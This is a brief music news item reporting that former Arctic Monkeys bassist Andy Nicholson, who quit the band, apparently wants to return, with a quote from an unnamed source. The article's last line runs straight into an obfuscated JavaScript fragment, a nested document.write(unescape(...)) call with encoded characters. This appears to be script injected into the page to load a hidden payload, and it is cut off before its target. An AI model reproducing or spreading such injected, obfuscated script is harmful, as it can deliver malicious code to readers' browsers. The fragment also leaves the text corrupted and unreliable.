The former bass player in the Arctic Monkeys is apparently "desperate" to rejoin the group.
Andy Nicholson quit the group last month, having already missed their recent North American tour citing "fatigue".
His replacement, Nick O'Malley, has been confirmed as Nicholson's temporary replacement, and played with The Monkeys at T In The Park in Scotland this weekend.
However, according to reports in the UK press yesterday, Nicholson's departure from the band was prompted by a disagreement with frontman Alex Turner and he is now seeking a return.
A 'source' explained: "He has been begging to come back, but Alex has said 'No'. Andy is devastated.
"There was a falling out. They need to sit down and sort out their differences. Who knows? Maybe there is still a chance of Andy returning."
Arctic Monkeys release a new single, "Leave Before The Lights Come On", on August 14.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
